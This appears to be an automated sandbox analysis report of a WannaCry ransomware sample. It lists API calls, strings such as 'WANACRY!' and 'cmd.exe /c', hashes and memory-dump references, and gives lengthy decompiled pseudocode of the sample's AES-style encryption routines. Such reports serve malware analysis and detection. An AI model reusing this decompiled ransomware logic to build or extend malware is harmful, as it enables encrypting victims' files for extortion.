OpenServiceA.ADVAPI32(00000000,0040F8AC,000F01FF), ref: 00401D21
StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00401D31
CloseServiceHandle.ADVAPI32(?), ref: 00401D3A
CloseServiceHandle.ADVAPI32(?), ref: 00401D9E

Strings

cmd.exe /c "%s", xrefs: 00401D4E

Memory Dump Source

Source File: 00000002.00000002.318030609.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.318024432.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318046591.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318070936.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318079309.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: Service$CloseHandleOpen$ManagerStart
String ID: cmd.exe /c "%s"
API String ID: 1485051382-955883872
Opcode ID: 4dc5d8109ff1f89eb2c8b95274d01a87daa9a34efcc40f147da3f0b4c8cffa2a
Instruction ID: 93977d8af42d47d1d9866270745c8e9c50065656b45fe828c5c40e24baaa5e60
Opcode Fuzzy Hash: 4dc5d8109ff1f89eb2c8b95274d01a87daa9a34efcc40f147da3f0b4c8cffa2a
Instruction Fuzzy Hash: 6411AF71900118BBDB205B659E4CE9FBF7CEF85745F10407AF601F21A0CA744949DB68

Uniqueness

Uniqueness Score: -1.00%

Function 00402A76 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 334
COMMONCrypto

Download Yara Rule

C-Code - Quality: 54%

			E00402A76(void* __ecx, signed int _a4, void* _a6, void* _a7, signed int _a8, signed int _a12, signed char* _a16) {
				signed int _v8;
				signed int _v12;
				char _v24;
				int _t193;
				signed int _t198;
				int _t199;
				intOrPtr _t200;
				signed int* _t205;
				signed char* _t206;
				signed int _t208;
				signed int _t210;
				signed int* _t216;
				signed int _t217;
				signed int* _t220;
				signed int* _t229;
				void* _t252;
				void* _t280;
				void* _t281;
				signed int _t283;
				signed int _t289;
				signed int _t290;
				signed char* _t291;
				signed int _t292;
				void* _t303;
				void* _t313;
				intOrPtr* _t314;
				void* _t315;
				intOrPtr* _t316;
				signed char* _t317;
				signed char* _t319;
				signed int _t320;
				signed int _t322;
				void* _t326;
				void* _t327;
				signed int _t329;
				signed int _t337;
				intOrPtr _t338;
				signed int _t340;
				intOrPtr _t341;
				void* _t342;
				signed int _t345;
				signed int* _t346;
				signed int _t347;
				void* _t352;
				void* _t353;
				void* _t354;

				_t352 = __ecx;
				if(_a4 == 0) {
					_a8 = 0x40f57c;
					__imp__??0exception@@QAE@ABQBD@Z( &_a8);
					_push(0x40d570);
					_push( &_v24);
					L0040776E();
				}
				_t283 = _a12;
				_t252 = 0x18;
				_t342 = 0x10;
				if(_t283 != _t342 && _t283 != _t252 && _t283 != 0x20) {
					_t283 =  &_v24;
					_a8 = 0x40f57c;
					__imp__??0exception@@QAE@ABQBD@Z( &_a8);
					_push(0x40d570);
					_push( &_v24);
					L0040776E();
				}
				_t193 = _a16;
				if(_t193 != _t342 && _t193 != _t252 && _t193 != 0x20) {
					_t283 =  &_v24;
					_a8 = 0x40f57c;
					__imp__??0exception@@QAE@ABQBD@Z( &_a8);
					_t193 =  &_v24;
					_push(0x40d570);
					_push(_t193);
					L0040776E();
				}
				 *(_t352 + 0x3cc) = _t193;
				 *(_t352 + 0x3c8) = _t283;
				memcpy(_t352 + 0x3d0, _a8, _t193);
				memcpy(_t352 + 0x3f0, _a8,  *(_t352 + 0x3cc));
				_t198 =  *(_t352 + 0x3c8);
				_t354 = _t353 + 0x18;
				if(_t198 == _t342) {
					_t199 =  *(_t352 + 0x3cc);
					if(_t199 != _t342) {
						_t200 = ((0 | _t199 != _t252) - 0x00000001 & 0xfffffffe) + 0xe;
					} else {
						_t200 = 0xa;
					}
					goto L17;
				} else {
					if(_t198 == _t252) {
						_t200 = ((0 |  *(_t352 + 0x3cc) == 0x00000020) - 0x00000001 & 0x000000fe) + 0xe;
						L17:
						 *((intOrPtr*)(_t352 + 0x410)) = _t200;
						L18:
						asm("cdq");
						_t289 = 4;
						_t326 = 0;
						_a12 =  *(_t352 + 0x3cc) / _t289;
						if( *((intOrPtr*)(_t352 + 0x410)) < 0) {
							L23:
							_t327 = 0;
							if( *((intOrPtr*)(_t352 + 0x410)) < 0) {
								L28:
								asm("cdq");
								_t290 = 4;
								_t291 = _a4;
								_t345 = ( *((intOrPtr*)(_t352 + 0x410)) + 1) * _a12;
								_v12 = _t345;
								_t329 =  *(_t352 + 0x3c8) / _t290;
								_t205 = _t352 + 0x414;
								_v8 = _t329;
								if(_t329 <= 0) {
									L31:
									_a8 = _a8 & 0x00000000;
									if(_t329 <= 0) {
										L35:
										if(_a8 >= _t345) {
											L51:
											_t206 = 1;
											_a16 = _t206;
											if( *((intOrPtr*)(_t352 + 0x410)) <= _t206) {
												L57:
												 *((char*)(_t352 + 4)) = 1;
												return _t206;
											}
											_a8 = _t352 + 0x208;
											do {
												_t292 = _a12;
												if(_t292 <= 0) {
													goto L56;
												}
												_t346 = _a8;
												do {
													_t208 =  *_t346;
													_a4 = _t208;
													 *_t346 =  *0x0040ABFC ^  *0x0040AFFC ^  *0x0040B3FC ^  *(0x40b7fc + (_t208 & 0x000000ff) * 4);
													_t346 =  &(_t346[1]);
													_t292 = _t292 - 1;
												} while (_t292 != 0);
												L56:
												_a16 =  &(_a16[1]);
												_a8 = _a8 + 0x20;
												_t206 = _a16;
											} while (_t206 <  *((intOrPtr*)(_t352 + 0x410)));
											goto L57;
										}
										_a16 = 0x40bbfc;
										do {
											_t210 =  *(_t352 + 0x410 + _t329 * 4);
											_a4 = _t210;
											 *(_t352 + 0x414) =  *(_t352 + 0x414) ^ ((( *0x004089FC ^  *_a16) << 0x00000008 ^  *0x004089FC & 0x000000ff) << 0x00000008 ^  *((_t210 & 0x000000ff) + 0x4089fc) & 0x000000ff) << 0x00000008 ^  *0x004089FC & 0x000000ff;
											_a16 = _a16 + 1;
											if(_t329 == 8) {
												_t216 = _t352 + 0x418;
												_t303 = 3;
												do {
													 *_t216 =  *_t216 ^  *(_t216 - 4);
													_t216 =  &(_t216[1]);
													_t303 = _t303 - 1;
												} while (_t303 != 0);
												_t217 =  *(_t352 + 0x420);
												_a4 = _t217;
												_t220 = _t352 + 0x428;
												 *(_t352 + 0x424) =  *(_t352 + 0x424) ^ (( *0x004089FC << 0x00000008 ^  *0x004089FC & 0x000000ff) << 0x00000008 ^  *0x004089FC & 0x000000ff) << 0x00000008 ^  *((_t217 & 0x000000ff) + 0x4089fc) & 0x000000ff;
												_t313 = 3;
												do {
													 *_t220 =  *_t220 ^  *(_t220 - 4);
													_t220 =  &(_t220[1]);
													_t313 = _t313 - 1;
												} while (_t313 != 0);
												L46:
												_a4 = _a4 & 0x00000000;
												if(_t329 <= 0) {
													goto L50;
												}
												_t314 = _t352 + 0x414;
												while(_a8 < _t345) {
													asm("cdq");
													_t347 = _a8 / _a12;
													asm("cdq");
													_t337 = _a8 % _a12;
													 *((intOrPtr*)(_t352 + 8 + (_t337 + _t347 * 8) * 4)) =  *_t314;
													_a4 = _a4 + 1;
													_t345 = _v12;
													_t338 =  *_t314;
													_t314 = _t314 + 4;
													_a8 = _a8 + 1;
													 *((intOrPtr*)(_t352 + 0x1e8 + (_t337 + ( *((intOrPtr*)(_t352 + 0x410)) - _t347) * 8) * 4)) = _t338;
													_t329 = _v8;
													if(_a4 < _t329) {
														continue;
													}
													goto L50;
												}
												goto L51;
											}
											if(_t329 <= 1) {
												goto L46;
											}
											_t229 = _t352 + 0x418;
											_t315 = _t329 - 1;
											do {
												 *_t229 =  *_t229 ^  *(_t229 - 4);
												_t229 =  &(_t229[1]);
												_t315 = _t315 - 1;
											} while (_t315 != 0);
											goto L46;
											L50:
										} while (_a8 < _t345);
										goto L51;
									}
									_t316 = _t352 + 0x414;
									while(_a8 < _t345) {
										asm("cdq");
										_a4 = _a8 / _a12;
										asm("cdq");
										_t340 = _a8 % _a12;
										 *((intOrPtr*)(_t352 + 8 + (_t340 + _a4 * 8) * 4)) =  *_t316;
										_a8 = _a8 + 1;
										_t341 =  *_t316;
										_t316 = _t316 + 4;
										 *((intOrPtr*)(_t352 + 0x1e8 + (_t340 + ( *((intOrPtr*)(_t352 + 0x410)) - _a4) * 8) * 4)) = _t341;
										_t329 = _v8;
										if(_a8 < _t329) {
											continue;
										}
										goto L35;
									}
									goto L51;
								}
								_a8 = _t329;
								do {
									_t317 =  &(_t291[1]);
									 *_t205 = ( *_t291 & 0x000000ff) << 0x18;
									 *_t205 =  *_t205 | ( *_t317 & 0x000000ff) << 0x00000010;
									_t319 =  &(_t317[2]);
									 *_t205 =  *_t205 |  *_t319 & 0x000000ff;
									_t291 =  &(_t319[1]);
									_t205 =  &(_t205[1]);
									_t60 =  &_a8;
									 *_t60 = _a8 - 1;
								} while ( *_t60 != 0);
								goto L31;
							}
							_t280 = _t352 + 0x1e8;
							do {
								_t320 = _a12;
								if(_t320 > 0) {
									memset(_t280, 0, _t320 << 2);
									_t354 = _t354 + 0xc;
								}
								_t327 = _t327 + 1;
								_t280 = _t280 + 0x20;
							} while (_t327 <=  *((intOrPtr*)(_t352 + 0x410)));
							goto L28;
						}
						_t281 = _t352 + 8;
						do {
							_t322 = _a12;
							if(_t322 > 0) {
								memset(_t281, 0, _t322 << 2);
								_t354 = _t354 + 0xc;
							}
							_t326 = _t326 + 1;
							_t281 = _t281 + 0x20;
						} while (_t326 <=  *((intOrPtr*)(_t352 + 0x410)));
						goto L23;
					}
					 *((intOrPtr*)(_t352 + 0x410)) = 0xe;
					goto L18;
				}
			}

0x00402a83
0x00402a85
0x00402a8e
0x00402a95
0x00402a9e
0x00402aa3
0x00402aa4
0x00402aa4
0x00402aa9
0x00402aae
0x00402ab1
0x00402ab4
0x00402ac2
0x00402ac6
0x00402acd
0x00402ad6
0x00402adb
0x00402adc
0x00402adc
0x00402ae1
0x00402ae6
0x00402af4
0x00402af8
0x00402aff
0x00402b05
0x00402b08
0x00402b0d
0x00402b0e
0x00402b0e
0x00402b14
0x00402b23
0x00402b2a
0x00402b3f
0x00402b44
0x00402b4a
0x00402b4f
0x00402b75
0x00402b7d
0x00402b92
0x00402b7f
0x00402b81
0x00402b81
0x00000000
0x00402b51
0x00402b53
0x00402b70
0x00402b94
0x00402b94
0x00402b9a
0x00402ba2
0x00402ba3
0x00402ba6
0x00402bae
0x00402bb1
0x00402bcf
0x00402bcf
0x00402bd7
0x00402bf8
0x00402c00
0x00402c01
0x00402c0b
0x00402c0e
0x00402c12
0x00402c15
0x00402c17
0x00402c1f
0x00402c22
0x00402c4e
0x00402c4e
0x00402c54
0x00402ca5
0x00402ca8
0x00402e04
0x00402e06
0x00402e0d
0x00402e10
0x00402e73
0x00402e73
0x00402e7b
0x00402e7b
0x00402e18
0x00402e1b
0x00402e1b
0x00402e20
0x00000000
0x00000000
0x00402e22
0x00402e25
0x00402e25
0x00402e29
0x00402e59
0x00402e5b
0x00402e5e
0x00402e5e
0x00402e61
0x00402e61
0x00402e64
0x00402e68
0x00402e6b
0x00000000
0x00402e1b
0x00402cae
0x00402cb5
0x00402cb5
0x00402cbf
0x00402d05
0x00402d0b
0x00402d11
0x00402d34
0x00402d3a
0x00402d3b
0x00402d3e
0x00402d40
0x00402d43
0x00402d43
0x00402d46
0x00402d4e
0x00402d8f
0x00402d95
0x00402d9b
0x00402d9c
0x00402d9f
0x00402da1
0x00402da4
0x00402da4
0x00402da7
0x00402da7
0x00402dad
0x00000000
0x00000000
0x00402daf
0x00402db5
0x00402dbf
0x00402dc3
0x00402dc8
0x00402dc9
0x00402dcf
0x00402ddb
0x00402dde
0x00402de4
0x00402de6
0x00402de9
0x00402dec
0x00402df3
0x00402df9
0x00000000
0x00000000
0x00000000
0x00402df9
0x00000000
0x00402db5
0x00402d16
0x00000000
0x00000000
0x00402d1c
0x00402d22
0x00402d25
0x00402d28
0x00402d2a
0x00402d2d
0x00402d2d
0x00000000
0x00402dfb
0x00402dfb
0x00000000
0x00402cb5
0x00402c56
0x00402c5c
0x00402c6a
0x00402c6e
0x00402c74
0x00402c75
0x00402c7e
0x00402c8b
0x00402c91
0x00402c93
0x00402c96
0x00402c9d
0x00402ca3
0x00000000
0x00000000
0x00000000
0x00402ca3
0x00000000
0x00402c5c
0x00402c24
0x00402c27
0x00402c2d
0x00402c2e
0x00402c36
0x00402c3f
0x00402c43
0x00402c45
0x00402c46
0x00402c49
0x00402c49
0x00402c49
0x00000000
0x00402c27
0x00402bd9
0x00402bdf
0x00402bdf
0x00402be4
0x00402bea
0x00402bea
0x00402bea
0x00402bec
0x00402bed
0x00402bf0
0x00000000
0x00402bdf
0x00402bb3
0x00402bb6
0x00402bb6
0x00402bbb
0x00402bc1
0x00402bc1
0x00402bc1
0x00402bc3
0x00402bc4
0x00402bc7
0x00000000
0x00402bb6
0x00402b55
0x00000000
0x00402b55

APIs

??0exception@@QAE@ABQBD@Z.MSVCRT(?,?,?,00000000,00000010,?), ref: 00402A95
_CxxThrowException.MSVCRT(00000010,0040D570,?,00000000,00000010,?), ref: 00402AA4
??0exception@@QAE@ABQBD@Z.MSVCRT(?,?,?,00000000,00000010,?), ref: 00402ACD
_CxxThrowException.MSVCRT(00000010,0040D570,?,00000000,00000010,?), ref: 00402ADC
??0exception@@QAE@ABQBD@Z.MSVCRT(?,?,?,00000000,00000010,?), ref: 00402AFF
_CxxThrowException.MSVCRT(00000010,0040D570,?,00000000,00000010,?), ref: 00402B0E
memcpy.MSVCRT(?,?,00000010,?,?,00000000,00000010,?,?), ref: 00402B2A
memcpy.MSVCRT(?,?,?,?,?,00000010,?,?,00000000,00000010,?,?), ref: 00402B3F

Strings

, xrefs: 00402E64

Memory Dump Source

Source File: 00000002.00000002.318030609.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.318024432.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318046591.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318070936.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318079309.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: ??0exception@@ExceptionThrow$memcpy
String ID:
API String ID: 1881450474-3916222277
Opcode ID: 13455132f19fce7ccee5142b200569a1d3dc411a47d032a17fbb22a214c81369
Instruction ID: fcfef073648f46ce18afaeffe4143d5033c2e410e09e17396796de68d512254b
Opcode Fuzzy Hash: 13455132f19fce7ccee5142b200569a1d3dc411a47d032a17fbb22a214c81369
Instruction Fuzzy Hash: 8DD1C3706006099FDB28CF29C5846EA77F5FF48314F14C43EE95AEB281D778AA85CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004014A6 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 178filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040150D
GetFileSizeEx.KERNEL32(00000000,?), ref: 00401529
memcmp.MSVCRT(?,WANACRY!,00000008), ref: 00401572
GlobalAlloc.KERNEL32(00000000,?,?,?,00000010,?,?,?,?), ref: 0040166D
_local_unwind2.MSVCRT(?,000000FF), ref: 004016D6

Strings

WANACRY!, xrefs: 00401566

Memory Dump Source

Source File: 00000002.00000002.318030609.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.318024432.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318046591.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318070936.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318079309.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: File$AllocCreateGlobalSize_local_unwind2memcmp
String ID: WANACRY!
API String ID: 283026544-1240840912
Opcode ID: 3616707767261f84fde6c13708b35c3d4dbb974938da28d5f777545cb9cffa02
Instruction ID: 23909f9b909e50c20e483d6bc4be6e23e355ec3bf8b0a6de4718622c8bde6caa
Opcode Fuzzy Hash: 3616707767261f84fde6c13708b35c3d4dbb974938da28d5f777545cb9cffa02
Instruction Fuzzy Hash: 6E512C71900209ABDB219F95CD84FEEB7BCEB08790F1444BAF515F21A0D739AA45CB28

Uniqueness

Uniqueness Score: -1.00%

Function 0040350F Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 214
COMMONCrypto

Download Yara Rule

C-Code - Quality: 55%

			E0040350F(void* __ecx, signed int _a4, signed char* _a8) {
				signed int _v8;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v56;
				signed int _t150;
				signed int _t151;
				signed int _t155;
				signed int* _t157;
				signed char _t158;
				intOrPtr _t219;
				signed int _t230;
				signed char* _t236;
				signed char* _t237;
				signed char* _t238;
				signed char* _t239;
				signed int* _t240;
				signed char* _t242;
				signed char* _t243;
				signed char* _t245;
				signed int _t260;
				signed int* _t273;
				signed int _t274;
				void* _t275;
				void* _t276;

				_t275 = __ecx;
				if( *((char*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
					_push(0x40d570);
					_push( &_v56);
					L0040776E();
				}
				_t150 =  *(_t275 + 0x3cc);
				if(_t150 == 0x10) {
					return E00402E7E(_t275, _a4, _a8);
				}
				asm("cdq");
				_t230 = 4;
				_t151 = _t150 / _t230;
				_t274 = _t151;
				asm("sbb eax, eax");
				_t155 = ( ~(_t151 - _t230) & (0 | _t274 != 0x00000006) + 0x00000001) << 5;
				_v28 =  *((intOrPtr*)(_t155 + 0x40bc24));
				_v24 =  *((intOrPtr*)(_t155 + 0x40bc2c));
				_v32 =  *((intOrPtr*)(_t155 + 0x40bc34));
				_t157 = _t275 + 0x454;
				if(_t274 > 0) {
					_v16 = _t274;
					_v8 = _t275 + 8;
					_t242 = _a4;
					do {
						_t243 =  &(_t242[1]);
						 *_t157 = ( *_t242 & 0x000000ff) << 0x18;
						 *_t157 =  *_t157 | ( *_t243 & 0x000000ff) << 0x00000010;
						_t245 =  &(_t243[2]);
						_t273 = _t157;
						 *_t157 =  *_t157 |  *_t245 & 0x000000ff;
						_v8 = _v8 + 4;
						_t242 =  &(_t245[1]);
						_t157 =  &(_t157[1]);
						 *_t273 =  *_t273 ^  *_v8;
						_t27 =  &_v16;
						 *_t27 = _v16 - 1;
					} while ( *_t27 != 0);
				}
				_t158 = 1;
				_v16 = _t158;
				if( *(_t275 + 0x410) > _t158) {
					_v12 = _t275 + 0x28;
					do {
						if(_t274 > 0) {
							_t34 =  &_v28; // 0x403b51
							_t260 =  *_t34;
							_v8 = _v12;
							_a4 = _t260;
							_v36 = _v24 - _t260;
							_t240 = _t275 + 0x434;
							_v40 = _v32 - _t260;
							_v20 = _t274;
							do {
								asm("cdq");
								_v44 = 0;
								asm("cdq");
								asm("cdq");
								_v8 = _v8 + 4;
								 *_t240 =  *(0x4093fc + _v44 * 4) ^  *(0x4097fc + ( *(_t275 + 0x454 + (_v40 + _a4) % _t274 * 4) & 0x000000ff) * 4) ^  *0x00408FFC ^  *0x00408BFC ^  *_v8;
								_t240 =  &(_t240[1]);
								_a4 = _a4 + 1;
								_t84 =  &_v20;
								 *_t84 = _v20 - 1;
							} while ( *_t84 != 0);
						}
						memcpy(_t275 + 0x454, _t275 + 0x434, _t274 << 2);
						_v12 = _v12 + 0x20;
						_t276 = _t276 + 0xc;
						_v16 = _v16 + 1;
						_t158 = _v16;
					} while (_t158 <  *(_t275 + 0x410));
				}
				_v8 = _v8 & 0x00000000;
				if(_t274 > 0) {
					_t236 = _a8;
					_t219 = _v24;
					_a8 = _t275 + 0x454;
					_t100 =  &_v28; // 0x403b51
					_v44 =  *_t100 - _t219;
					_v40 = _v32 - _t219;
					do {
						_a8 =  &(_a8[4]);
						_a4 =  *((intOrPtr*)(_t275 + 8 + (_v8 +  *(_t275 + 0x410) * 8) * 4));
						 *_t236 =  *0x004089FC ^ _a4 >> 0x00000018;
						_t237 =  &(_t236[1]);
						asm("cdq");
						 *_t237 =  *0x004089FC ^ _a4 >> 0x00000010;
						asm("cdq");
						_t238 =  &(_t237[1]);
						 *_t238 =  *0x004089FC ^ _a4 >> 0x00000008;
						_t239 =  &(_t238[1]);
						asm("cdq");
						_t158 =  *(( *(_t275 + 0x454 + (_v40 + _t219) % _t274 * 4) & 0x000000ff) + 0x4089fc) ^ _a4;
						 *_t239 = _t158;
						_t236 =  &(_t239[1]);
						_v8 = _v8 + 1;
						_t219 = _t219 + 1;
					} while (_v8 < _t274);
				}
				return _t158;
			}

0x00403517
0x0040351e
0x00403528
0x00403531
0x00403536
0x00403537
0x00403537
0x0040353c
0x00403545
0x00000000
0x0040354f
0x0040355b
0x0040355c
0x0040355d
0x0040355f
0x0040356e
0x00403572
0x0040357d
0x0040358c
0x0040358f
0x00403592
0x00403598
0x0040359d
0x004035a0
0x004035a3
0x004035a6
0x004035ac
0x004035ad
0x004035b5
0x004035be
0x004035bf
0x004035c4
0x004035c9
0x004035cd
0x004035d0
0x004035d3
0x004035d5
0x004035d5
0x004035d5
0x004035a6
0x004035dc
0x004035e3
0x004035e6
0x004035ef
0x004035f2
0x004035f4
0x004035fd
0x004035fd
0x00403600
0x00403608
0x0040360b
0x00403613
0x00403619
0x0040361c
0x0040361f
0x00403627
0x0040363a
0x0040363d
0x00403660
0x00403682
0x00403688
0x0040368a
0x0040368d
0x00403690
0x00403690
0x00403690
0x0040361f
0x004036a9
0x004036ae
0x004036b2
0x004036b5
0x004036b8
0x004036bb
0x004035f2
0x004036c7
0x004036cd
0x004036d3
0x004036d6
0x004036df
0x004036e2
0x004036e7
0x004036ef
0x004036f2
0x00403701
0x00403709
0x0040371f
0x00403726
0x00403727
0x00403741
0x00403745
0x0040374a
0x00403760
0x00403767
0x00403768
0x0040377d
0x00403780
0x00403782
0x00403783
0x00403786
0x00403787
0x004036f2
0x00403794

APIs

??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,?,?,?,?,?,00403B51,?,?,?), ref: 00403528
_CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,?,?,?,00403B51,?,?,?), ref: 00403537
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00403B51,?,?), ref: 004036A9

Strings

, xrefs: 004036AE
Q;@, xrefs: 004036E2, 004035FD

Memory Dump Source

Source File: 00000002.00000002.318030609.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.318024432.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318046591.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318070936.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.318079309.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: ??0exception@@ExceptionThrowmemcpy
String ID: $Q;@
API String ID: 2382887404-262343263
Opcode ID: 68433a68c8f87a96c4578501cf6b50a347b0c2ca376bc2ea45e1a632b2ad4c4a
Instruction ID: bc36c6e363c45e845c5013d3ee32ff29fee655b638a1b5d52e43d816bbd12583
Opcode Fuzzy Hash: 68433a68c8f87a96c4578501cf6b50a347b0c2ca376bc2ea45e1a632b2ad4c4a
Instruction Fuzzy Hash: A581C3759002499FCB05CF68C9809EEBBF5EF89308F2484AEE595E7352C234BA45CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00403797 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 214
COMMONCrypto

Download Yara Rule

C-Code - Quality: 54%

			E00403797(void* __ecx, signed int _a4, signed char* _a8) {
				signed int _v8;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v56;
				signed int _t150;
				signed int _t151;
				signed int _t155;
				signed int* _t157;
				signed char _t158;
				intOrPtr _t219;
				signed int _t230;
				signed char* _t236;
				signed char* _t237;
				signed char* _t238;
				signed char* _t239;
				signed int* _t240;
				signed char* _t242;
				signed char* _t243;
				signed char* _t245;
				signed int _t260;
				signed int* _t273;
				signed int _t274;
				void* _t275;
				void* _t276;

				_t275 = __ecx;
				if( *((char*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
					_push(0x40d570);
					_push( &_v56);
					L0040776E();
				}
				_t150 =  *(_t275 + 0x3cc);
				if(_t150 == 0x10) {
					return E004031BC(_t275, _a4, _a8);
				}
				asm("cdq");
				_t230 = 4;
				_t151 = _t150 / _t230;
				_t274 = _t151;
				asm("sbb eax, eax");
				_t155 = ( ~(_t151 - _t230) & (0 | _t274 != 0x00000006) + 0x00000001) << 5;
				_v28 =  *((intOrPtr*)(_t155 + 0x40bc28));
				_v24 =  *((intOrPtr*)(_t155 + 0x40bc30));
				_v32 =  *((intOrPtr*)(_t155 + 0x40bc38));
				_t157 = _t275 + 0x454;
				if(_t274 > 0) {
					_v16 = _t274;
					_v8 = _t275 + 0x1e8;
					_t242 = _a4;
					do {
						_t243 =  &(_t242[1]);
						 *_t157 = ( *_t242 & 0x000000ff) << 0x18;
						 *_t157 =  *_t157 | ( *_t243 & 0x000000ff) << 0x00000010;
						_t245 =  &(_t243[2]);
						_t273 = _t157;
						 *_t157 =  *_t157 |  *_t245 & 0x000000ff;
						_v8 = _v8 + 4;
						_t242 =  &(_t245[1]);
						_t157 =  &(_t157[1]);
						 *_t273 =  *_t273 ^  *_v8;
						_t27 =  &_v16;
						 *_t27 = _v16 - 1;
					} while ( *_t27 != 0);
				}
				_t158 = 1;
				_v16 = _t158;
				if( *(_t275 + 0x410) > _t158) {
					_v12 = _t275 + 0x208;
					do {
						if(_t274 > 0) {
							_t260 = _v28;
							_v8 = _v12;
							_a4 = _t260;
							_v36 = _v24 - _t260;
							_t240 = _t275 + 0x434;
							_v40 = _v32 - _t260;
							_v20 = _t274;
							do {
								asm("cdq");
								_v44 = 0;
								asm("cdq");
								asm("cdq");
								_v8 = _v8 + 4;
								 *_t240 =  *(0x40a3fc + _v44 * 4) ^  *(0x40a7fc + ( *(_t275 + 0x454 + (_v40 + _a4) % _t274 * 4) & 0x000000ff) * 4) ^  *0x00409FFC ^  *0x00409BFC ^  *_v8;
								_t240 =  &(_t240[1]);
								_a4 = _a4 + 1;
								_t84 =  &_v20;
								 *_t84 = _v20 - 1;
							} while ( *_t84 != 0);
						}
						memcpy(_t275 + 0x454, _t275 + 0x434, _t274 << 2);
						_v12 = _v12 + 0x20;
						_t276 = _t276 + 0xc;
						_v16 = _v16 + 1;
						_t158 = _v16;
					} while (_t158 <  *(_t275 + 0x410));
				}
				_v8 = _v8 & 0x00000000;
				if(_t274 > 0) {
					_t236 = _a8;
					_t219 = _v24;
					_a8 = _t275 + 0x454;
					_v44 = _v28 - _t219;
					_v40 = _v32 - _t219;
					do {
						_a8 =  &(_a8[4]);
						_a4 =  *((intOrPtr*)(_t275 + 0x1e8 + (_v8 +  *(_t275 + 0x410) * 8) * 4));
						 *_t236 =  *0x00408AFC ^ _a4 >> 0x00000018;
						_t237 =  &(_t236[1]);
						asm("cdq");
						 *_t237 =  *0x00408AFC ^ _a4 >> 0x00000010;
						asm("cdq");
						_t238 =  &(_t237[1]);
						 *_t238 =  *0x00408AFC ^ _a4 >> 0x00000008;
						_t239 =  &(_t238[1]);
						asm("cdq");
						_t158 =  *(( *(_t275 + 0x454 + (_v40 + _t219) % _t274 * 4) & 0x000000ff) + 0x408afc) ^ _a4;
						 *_t239 = _t158;
						_t236 =  &(_t239[1]);
						_v8 = _v8 + 1;
						_t219 = _t219 + 1;
					} while (_v8 < _t274);
				}
				return _t158;
			}

0x0040379f
0x004037a6
0x004037b0
0x004037b9
0x004037be
0x004037bf
0x004037bf
0x004037c4
0x004037cd
0x00000000
0x004037d7
0x004037e3
0x004037e4
0x004037e5
0x004037e7
0x004037f6
0x004037fa
0x00403805
0x00403814
0x00403817
0x0040381a
0x00403820
0x00403828
0x0040382b
0x0040382e
0x00403831
0x00403837
0x00403838
0x00403840
0x00403849
0x0040384a
0x0040384f
0x00403854
0x00403858
0x0040385b
0x0040385e
0x00403860
0x00403860
0x00403860
0x00403831
0x00403867
0x0040386e
0x00403871
0x0040387d
0x00403880
0x00403882
0x0040388b
0x0040388e
0x00403896
0x00403899
0x004038a1
0x004038a7
0x004038aa
0x004038ad
0x004038b5
0x004038c8
0x004038cb
0x004038ee
0x00403910
0x00403916
0x00403918
0x0040391b
0x0040391e
0x0040391e
0x0040391e
0x004038ad
0x00403937
0x0040393c
0x00403940
0x00403943
0x00403946
0x00403949
0x00403880
0x00403955
0x0040395b
0x00403961
0x00403964
0x0040396d
0x00403975
0x0040397d
0x00403980
0x0040398f
0x0040399a
0x004039b0
0x004039b7
0x004039b8
0x004039d2
0x004039d6
0x004039db
0x004039f1
0x004039f8
0x004039f9
0x00403a0e
0x00403a11
0x00403a13
0x00403a14
0x00403a17
0x00403a18
0x00403980
0x00403a25

APIs

??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,?,?,?,?,?,00403B9C,?,?,?), ref: 004037B0
